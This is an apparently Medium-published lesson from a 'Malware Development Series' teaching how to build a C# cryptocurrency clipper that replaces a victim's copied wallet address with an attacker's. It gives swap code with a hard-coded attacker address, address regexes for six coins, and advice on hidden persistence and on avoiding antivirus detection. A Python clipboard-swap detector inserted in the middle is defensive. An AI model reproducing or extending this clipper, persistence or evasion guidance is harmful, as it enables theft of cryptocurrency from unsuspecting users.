Lesson 12: Crypto Clipper — Stealing Cryptocurrency Like a Pro

👾 Malware Development Series by XIT (C#)

XIT
4 min read · Apr 9, 2023

Follow XIT on medium & UglyCompany on Telegram for more..

Below is the Topics List for Lesson 12:

12. Crypto Clipper:
⇢ BTC
⇢ ETH
⇢ Ripple
⇢ Litecoin
⇢ BTC Cash
⇢ Monero
more…

In this lesson, we’ll demonstrate how to add functionality that steals cryptocurrency by replacing the user’s wallet address with the attacker’s address. In lesson 9 we learnt about stealing cryptocurrency from offline wallets present on the target machine. This lesson covers the most popular cryptocurrencies: BTC, ETH, Ripple, Litecoin, BTC Cash, and Monero. You will learn how to develop a function in your malware that replaces the recipient wallet address in clipboard memory with your own. This simple yet effective technique can help you steal cryptocurrency without detection. Join us to learn how to become a pro at stealing cryptocurrency with Crypto Clipper!

Below is the basic idea of how it works: the code checks the user’s address against a regular expression pattern, and if the address matches, it replaces the user’s address with the attacker’s address.

// clipper
using System;
using System.Text.RegularExpressions;

class Clipper
{
    static void Main()
    {
        // attacker address
        string attackerAddress = "1FfmbHfnpaZjKFvyi1okTjJJusN455paPH";

        // user address
        string userAddress = "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh";

        // regex pattern to match user's address
        string regexPattern = @"^bc[13][a-zA-HJ-NP-Z0-9]{25,39}$";

        // Check whether the address matches the regex pattern
        if (Regex.IsMatch(userAddress, regexPattern))
        {
            // Replace user address with attacker address
            userAddress = attackerAddress;

            // Display message to confirm replacement
            Console.WriteLine("User's address has been replaced with attacker's address.");
        }
        else
        {
            // Display message if user's address does not match regex pattern
            Console.WriteLine("User's address is invalid and cannot be replaced.");
        }
    }
}

You can add support for other wallets by just replacing the regex pattern and the address to be substituted. In the above example I’ve used one predefined wallet address, but you have to add a listener that watches the user’s clipboard, and whenever an address matching the given regex is found it is replaced.

Below are regex patterns for other crypto addresses:

BTC

string regexPattern = @"^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$";

This pattern matches BTC addresses that start with “bc1” or “1” or “3”, followed by 25 to 39 alphanumeric characters, excluding “0”, “O”, “I”, and “l” to avoid ambiguity.

ETH

string regexPattern = @"^0x[a-fA-F0-9]{40}$";

This pattern matches ETH addresses that start with “0x”, followed by 40 hexadecimal characters.

Ripple

string regexPattern = @"^r[0-9a-zA-Z]{24,34}$";

This pattern matches Ripple addresses that start with “r”, followed by 24 to 34 alphanumeric characters.

Litecoin

string regexPattern = @"^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$";

This pattern matches Litecoin addresses that start with “L”, “M”, or “3”, followed by 26 to 33 alphanumeric characters, excluding “0”, “O”, “I”, and “l” to avoid ambiguity.

BTC Cash

string regexPattern = @"^([qpzry9x8gf2tvdw0s3jn54khce6mua7l]{42}|(bitcoincash:)?(q|p)[a-z0-9]{41})$";

This pattern matches BTC Cash addresses that start with “q” or “p”, followed by 41 alphanumeric characters, or addresses encoded in base58 with the prefix characters “bitcoincash:”, followed by 42 base58 characters.

Monero

string regexPattern = @"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$";

This pattern matches Monero addresses that start with “4”, followed by a character in the range of “0” to “9” or “A” to “B”, followed by 93 alphanumeric characters, excluding “0”, “O”, “I”, and “l” to avoid ambiguity.
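As an added, defender-side example (not the lesson’s own code), here is Python clipboard-guard logic that uses the six patterns above to classify clipboard text and flags the behaviour this lesson describes: an address replaced by a different address of the same family within a couple of seconds of the user’s copy. Reading the clipboard is platform-specific and left out; the function takes constructed (timestamp_ms, text) polls, and the sample reuses the lesson’s two BTC addresses.

```python
import re

# Address patterns quoted from the lesson above. As written, the BTC class
# [a-zA-HJ-NP-Z0-9] still admits '0' and 'l', so it over-matches a little.
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"),
    "ETH": re.compile(r"^0x[a-fA-F0-9]{40}$"),
    "XRP": re.compile(r"^r[0-9a-zA-Z]{24,34}$"),
    "LTC": re.compile(r"^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$"),
    "BCH": re.compile(r"^([qpzry9x8gf2tvdw0s3jn54khce6mua7l]{42}|(bitcoincash:)?(q|p)[a-z0-9]{41})$"),
    "XMR": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}

def classify(text):
    """Return the coin family a clipboard string looks like, or None.
    Families are tried in dict order, so a '3...' address is reported as BTC."""
    text = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None

def detect_swaps(polls, window_ms=2000):
    """polls: successive clipboard reads as (timestamp_ms, text). Flag an address
    replaced by a *different* address of the same family within window_ms of the
    previous change: people rarely copy two addresses that fast, clippers do."""
    alerts = []
    last_text, last_change_ts = None, None
    for ts, text in polls:
        if text == last_text:
            continue  # clipboard unchanged since the previous poll
        if last_text is not None:
            before, after = classify(last_text), classify(text)
            if before is not None and before == after and ts - last_change_ts <= window_ms:
                alerts.append({"ts": ts, "coin": after, "before": last_text, "after": text})
        last_text, last_change_ts = text, ts
    return alerts

# Constructed clipboard polls: the lesson's two sample addresses 40 ms apart,
# then two different ETH addresses copied 21 s apart (ordinary user behaviour).
SAMPLE_POLLS = [
    (0, "meeting notes for tuesday"),
    (1000, "1FfmbHfnpaZjKFvyi1okTjJJusN455paPH"),
    (1040, "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh"),
    (1080, "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh"),
    (9000, "0x" + "a" * 40),
    (30000, "0x" + "b" * 40),
]
```

Calling detect_swaps(SAMPLE_POLLS) returns a single alert, for the BTC rewrite at 1040 ms; the two ETH addresses 21 s apart are not flagged.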

Finally, I compiled all the topics of lesson 12 and also added a persistent listener so it can listen to the clipboard values forever in the background, with the process hidden as well; later it was detected by 0 out of 26 antivirus scans.

Remember: Don’t share your unencrypted assemblies or malware source with random antivirus scanners; use only those listed in the article given below to keep your malware undetected forever:

https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed

Conclusion

“Clipper” is a type of malicious program used by hackers to steal cryptocurrency from victims by replacing their wallet addresses with the attacker’s address. It can be distributed through phishing emails, malicious websites, or even legitimate app stores. Victims may suffer significant financial losses, and the use of clipper malware is illegal and unethical. Good cybersecurity practices can help protect against clipper malware and other types of cyberattacks.

A supporter is worth a thousand followers. 😊


XIT

SHHH! The voice of none is stronger than the voice of one.